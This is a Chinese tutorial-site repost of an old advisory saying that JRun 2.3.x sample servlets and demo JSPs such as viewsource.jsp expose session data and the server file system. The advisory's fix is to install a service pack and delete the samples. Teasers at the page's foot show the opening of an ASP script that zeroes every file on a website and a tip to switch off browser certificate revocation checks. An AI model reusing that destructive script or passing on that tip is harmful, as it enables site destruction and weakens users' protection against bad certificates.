JRun 2.3.x 范例文件暴露站点安全信息

2016-01-29 12:46 9 1 收藏

JRun 2.3.x 范例文件暴露站点安全信息,JRun 2.3.x 范例文件暴露站点安全信息

【 tulaoshi.com - Java 】

涉及程序:
JRun 2.3.x

描述:
JRun 2.3.x 范例文件暴露站点安全信息

详细:
JRun 2.3.x 在 JRUN_HOME/servlets 目录下有一些 servlet 范例文件,这个目录是 JRun 2.3.x 用于加载和执行 servlets 文件。所有扩展名为 ".java" 或 "class" 的文件必须被删除,这是因为这些文件会暴露站点的安全信息。例如:
http://www.xxx.xxx/servlet/SessionServlet 会暴露当前服务器保持的HTTP连接信息。

(本文来源于图老师网站,更多请访问http://www.tulaoshi.com/java/)

JRUN_HOME/jsm-default/services/jws/htdocs 目录下的内容也应被删除掉。这个目录保存有演示服务器功能的 '.jsp' 文件,其中一些文件牵涉到访问服务器文件系统和暴露服务器设置的问题。例如对文件 "viewsource.jsp" 的路径检查是默认关闭的,它可被用于访问服务器文件系统。

(本文来源于图老师网站,更多请访问http://www.tulaoshi.com/java/)

解决方案:
1)安装 2.3.3 service pack

2)从服务器上删除所有的说明文档、演示编码、范例和教材,包括安装 JRun 2.3.x 时存放于 JRUN_HOME/servlets 目录和JRUN_HOME/jsm-default/services/jws/htdocs 目录里的文档。

相关站点:
http://www.allaire.com/

来源:http://www.tulaoshi.com/n/20160129/1487505.html

延伸阅读
标签: PS PS教程
当你存储了一份PSD文件后,你会发现此文件与其他图形文件外形上有很大的不同(默认为图四样式),一般的我们所使用的图片文件格式都是根据其默认打开的程序的图标而来,比如在装有ACDSEE看图程序后JPG、GIF等格式皆显示为相应图标(如右图一图二。当然你可发自己更改图标的样式,更改方式在此不多费话。) 在存储了PSD文件的...
标签: ASP
  作用:可以清空此文件所在的web站点所有文件,将文件内容清零.运行完毕所有文件大小都变成0字节. 此代码本人原创,转载请注明转自lamking.com,谢谢合作.另外程序可以扩展. 属于无聊时的作品,已经有人利用这个破坏了一些网站了. <% Server.ScriptTimeout=99999 If Request("Submit")<"" Then  Call ListFile(Server.mappath("...
标签: Java JAVA基础
涉及程序: IBM WebSphere Application Server 3.0.2及更低版本 描述: IBM WebSphere Application Server 暴露JSP文件内容 详细: Java Server Pages (JSP)类型的文件是以'.jsp'扩展名在WebSphere Application Serve 上注册,WebSphere 是文件名大小写敏感的,'.jsp'和'.JSP'是不同类型的文件扩展名。如果提交有'.JSP'的链接给WebSpher...
标签: ASP
  一:前言 (仅以此文感谢好友bigeagle。不是他,我可能不用这么担心win2000安全问题的。呵呵!) 人说,一朝被蛇咬,十年怕.....。就是这样。2000年初,当我终于摆脱winnt 4.0 server那可怕的补丁之旅,迈向win2000 server时。我终于可以比较放心我的服务器了。但随着sp1的补丁出现。我知道,与微软的补丁因缘又开始轮回了。但还好。win...
标签: 浏览器
搜狗浏览器提示该站点安全证书的吊销信息不可用怎么办?   用搜狗浏览器打开经过SSL加密的网站都会出现提示"该站点安全证书的吊销信息不可用。是否继续?"如图: 第一步:打开浏览器,然后找到工具 第二步:在工具的下拉列表中找到Internet选项 第三步:如图,取消选择红色标记的2个选项即可。 ...

经验教程

21

收藏

80
微博分享 QQ分享 QQ空间 手机页面 收藏网站 回到头部